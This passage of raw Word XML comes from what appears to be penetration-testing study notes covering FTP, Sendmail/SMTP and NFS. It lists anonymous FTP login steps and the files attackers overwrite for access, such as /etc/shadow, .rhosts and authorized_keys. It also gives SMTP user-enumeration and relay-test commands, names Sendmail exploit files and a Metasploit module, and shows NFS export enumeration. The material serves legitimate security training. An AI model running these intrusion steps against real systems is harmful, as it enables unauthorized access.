        <w:t>Clean up after yourself:</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Use single folder for all uploads and saved files then remove folder on completion</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 xml:space="preserve">Re-enable services </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Restore changed file/registry permissions</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Remove all added user from machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>F3 – FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00816A83" w:rsidRDefault="009D6D8E" w:rsidP="00816A83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>FTP access control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00245334" w:rsidRDefault="00245334" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245334">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FTP access is based on username and password. Users can be provided with specific root folders once access is granted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00816A83" w:rsidRDefault="009D6D8E" w:rsidP="00816A83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6735"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F3b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Anonymous access to FTP servers</w:t>
      </w:r>
      <w:r w:rsidR="00BD2000">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD2000" w:rsidRPr="00BD2000" w:rsidRDefault="00BD2000" w:rsidP="00BD2000">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ftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;ip&gt;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356B14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows client</w:t>
      </w:r>
      <w:r w:rsidR="00356B14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245334" w:rsidRPr="00245334" w:rsidRDefault="00245334" w:rsidP="00245334">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245334">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>USER anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00245334" w:rsidRDefault="00245334" w:rsidP="00245334">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245334">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PASS a@b.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F3c - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t xml:space="preserve">Risks of allowing </w:t>
      </w:r>
      <w:r>
        <w:t>write access to anonymous users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="0013443A" w:rsidRDefault="00245334" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013443A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload trojans that may then be run by a privileged user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245334" w:rsidRPr="0013443A" w:rsidRDefault="00245334" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013443A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maybe overwrite or write</w:t>
      </w:r>
      <w:r w:rsidR="00BD2000" w:rsidRPr="0013443A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidRPr="0013443A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sensitive files that would allow further access. For example:</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/etc/passwd</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/etc/shadow</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w:t>
      </w:r>
      <w:r w:rsidR="00BD2000" w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/hosts.equiv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD2000" w:rsidRPr="00BD2000" w:rsidRDefault="00BD2000"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.rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="0013443A" w:rsidRDefault="00BD2000" w:rsidP="0013443A">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.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>F4 - Sendmail /SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Valid username discovery via EXPN and VRFY</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VRFY –U users.txt –t &lt;target&gt;</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EXPN –U users.txt –t &lt;target&gt;</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RCPT –U users.txt –t &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F4b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00484074" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sendmail Address Prescan Memory Corruption Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sormail.c</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Sendmail Header Processing Buffer Overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux86_sendmail.c</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Multiple Vendor lpd Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>qib.tgz</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Berkeley Sendmail Daemon Mode Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sendmail-dmode.sh</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Sendmail Asynchronous Signal Handling Remote Code Execution Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sendtest.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B67" w:rsidRPr="00484074" w:rsidRDefault="00E31B67" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD2000" w:rsidRPr="00484074" w:rsidRDefault="00BD2000" w:rsidP="00BD2000">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security Vulnerability in the in.lpd Daemon (solaris)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00484074" w:rsidRDefault="00BD2000" w:rsidP="00484074">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00484074">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">exploit/solaris/lpd/sendmail_exec              </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F4c - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Mail relaying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00F34D78" w:rsidRDefault="000011EE" w:rsidP="000011EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F34D78">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F34D78">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;target&gt; 25</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EHLO</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MAIL FROM: </w:t>
      </w:r>
      <w:r w:rsidR="009021DD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>test@test.com</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RCPT TO: </w:t>
      </w:r>
      <w:r w:rsidR="009021DD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>test@test.com</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DATA </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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8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QUIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>F5 - Network File System (NFS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="00D317B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F5a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t xml:space="preserve">NFS security: host level (exports restricted to particular hosts) </w:t>
      </w:r>
      <w:r>
        <w:t>and file level (by UID and GID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC3F37" w:rsidRPr="00EC3F37" w:rsidRDefault="00EC3F37" w:rsidP="00EC3F37">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network File System (NFS) is a network file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a network in a manner similar to how local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. Assuming a Unix-style scenario in which one machine (the client) requires access to data stored on another machine (the NFS server):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC3F37" w:rsidRPr="00EC3F37" w:rsidRDefault="00EC3F37" w:rsidP="00EC3F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The server implements NFS daemon processes (running by default as nfsd) in order to make its data generically available to clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC3F37" w:rsidRPr="00EC3F37" w:rsidRDefault="00EC3F37" w:rsidP="00EC3F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The server administrator determines what to make available, exporting the names and parameters of directories (typically using the /etc/exports configuration file and the exportfs command)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> access restrictions are based solely on IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC3F37" w:rsidRPr="00EC3F37" w:rsidRDefault="00EC3F37" w:rsidP="00EC3F37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The client machine requests access to exported data, typically by issuing a mount command. (The client asks the server (rpcbind) which port the NFS server is using, the client connects to the NFS server (nfsd), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nfsd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> passes the request to mountd)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F37">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client machine can then view and interact with mounted filesystems on the server within the parameters permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC3F37" w:rsidRPr="00EC3F37" w:rsidRDefault="00EC3F37" w:rsidP="00EC3F37"/>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00B747C4" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Is NFS running</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00C53E5F"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rpcinfo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p &lt;IP ADDRESS&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00C53E5F"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    100003    2   udp   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2049  nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00C53E5F"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    100003    2   tcp   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2049  nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B747C4" w:rsidRPr="00B747C4" w:rsidRDefault="00B747C4" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00D317B0" w:rsidRDefault="00B747C4" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What is it</w:t>
      </w:r>
      <w:r w:rsidR="00C53E5F" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exporting</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00B747C4"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showmount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00B747C4"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Exports list </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>on ??</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.??.??.??</w:t>
      </w:r>
      <w:r w:rsidR="00C53E5F" w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00BD2000" w:rsidP="00B747C4">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/home/dan</w:t>
      </w:r>
      <w:r w:rsidR="00C53E5F" w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                          0.0.0.0/0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00C53E5F"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or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> using nfsshell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRDefault="00C53E5F" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D317B0" w:rsidRPr="00D317B0" w:rsidRDefault="00D317B0" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nfsshell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
